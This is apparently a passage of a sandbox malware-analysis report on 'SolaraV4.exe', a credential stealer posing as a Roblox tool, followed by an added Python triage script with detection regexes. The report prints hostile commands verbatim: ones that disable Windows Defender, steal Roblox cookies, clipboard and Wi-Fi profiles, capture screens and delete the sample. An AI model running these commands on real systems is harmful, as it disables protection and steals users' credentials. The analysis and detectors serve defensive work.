Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\SolaraV4.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Users\user\Desktop\SolaraV4.exe "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()""
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()""
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand …"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\SolaraV4.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACA
AUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6CAA.tmp" "c:\Users\user\AppData\Local\Temp\myx0gned\CSC193A8B703A1D4F08B0E861F82E42C2AF.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
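The process-creation entries above carry most of the behaviour that the signatures in the overview summarise: Defender tampering through Set-MpPreference, Add-MpPreference and MpCmdRun -RemoveDefinitions, an -EncodedCommand PowerShell launch that is followed by csc.exe and cvtres.exe (the blob decodes to an Add-Type wrapper around a C# class that captures every screen), self-deletion via ping && del, netsh wlan profile dumping, a password-protected rar archive, hosts-file attribute flipping and the .ROBLOSECURITY registry read. The following triage script is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It parses lines in the report's "Source: … Process created: …" shape, tags them with command-line rules, and decodes any -EncodedCommand blob, including a blob cut short the way the one in the listing above is. The rule names and the sample lines are this example's own (the samples are constructed to mirror entries in the listing, not copied from it programmatically).

```python
"""Triage helper for sandbox 'Process created' lines (added example, not the report's own code)."""
import base64
import binascii
import re

# One report event per line: "Source: <parent image> Process created: <child image> <command line>".
EVENT_RE = re.compile(r"^Source:\s+(.*?)\s+Process created:\s+(.*)$")

# PowerShell accepts -EncodedCommand, -enc or -e followed by base64 of a UTF-16LE script.
ENC_RE = re.compile(r"-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

# Behaviours seen in the listing above, expressed as command-line patterns (rule names are ours).
RULES = [
    ("defender_disable", re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$true", re.IGNORECASE)),
    ("defender_exclusion", re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.IGNORECASE)),
    ("defender_remove_definitions", re.compile(r"MpCmdRun\.exe.*-RemoveDefinitions", re.IGNORECASE)),
    ("encoded_powershell", ENC_RE),
    ("self_delete", re.compile(r"\bping\s+\S+.*&&\s*del\s+.*\.exe", re.IGNORECASE)),
    ("wlan_profile_dump", re.compile(r"netsh\s+wlan\s+show\s+profile", re.IGNORECASE)),
    ("password_archive", re.compile(r"rar\.exe\s+a\b.*\s-hp", re.IGNORECASE)),
    ("hosts_file_tamper", re.compile(r"attrib\s+[+-]r\s+.*drivers\\etc\\hosts", re.IGNORECASE)),
    ("roblox_cookie", re.compile(r"\.ROBLOSECURITY", re.IGNORECASE)),
]


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None when the line carries none.

    Report dumps often cut the blob short; the incomplete trailing base64 quartet and any
    dangling odd byte are dropped so the surviving UTF-16LE prefix still decodes.
    """
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob = blob[: len(blob) - len(blob) % 4]
    try:
        raw = base64.b64decode(blob)
    except binascii.Error:
        return None
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le", errors="replace")


def scan(lines):
    """Tag each parsable event line; events matching no rule are dropped from the result."""
    findings = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        parent, cmdline = m.group(1), m.group(2)
        tags = [name for name, rx in RULES if rx.search(cmdline)]
        if not tags:
            continue
        finding = {"parent": parent, "cmdline": cmdline, "tags": tags}
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            finding["decoded"] = decoded
        findings.append(finding)
    return findings


# Constructed input: a short script encoded the way PowerShell expects, then sample event lines
# modelled on the listing above (re-typed for this example, not extracted from the report).
_ENC = base64.b64encode("Get-Clipboard".encode("utf-16-le")).decode("ascii")
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\cmd.exe Process created: " + _PS + r" powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend",
    r"Source: C:\Windows\System32\cmd.exe Process created: " + _PS + r" powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r"Source: C:\Windows\System32\cmd.exe Process created: " + _PS + " powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + _ENC,
    r'Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\SolaraV4.exe""',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts",
    r"Source: C:\Windows\System32\cmd.exe Process created: " + _PS + r" powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(", ".join(f["tags"]), "<-", f["cmdline"][:90])
        if "decoded" in f:
            print("    decoded:", f["decoded"])
```

Running the script on the constructed lines yields nine findings, one per rule, with the tasklist line dropped as benign; the encoded line additionally reports the decoded script. Against the real -EncodedCommand entry above the same decoder returns the readable prefix of the Add-Type screenshot wrapper, which is the fastest way to confirm why csc.exe and cvtres.exe follow that PowerShell launch in the listing. Treat the rules as triage hints rather than a detection ruleset: they key on the exact tool names and switches this sample used, and a variant that calls the Defender cmdlets through a different host or archives with a different tool would need its own pattern.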
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: python3.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: libffi-7.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: sqlite3.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: libssl-1_1.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: avicap32.dll
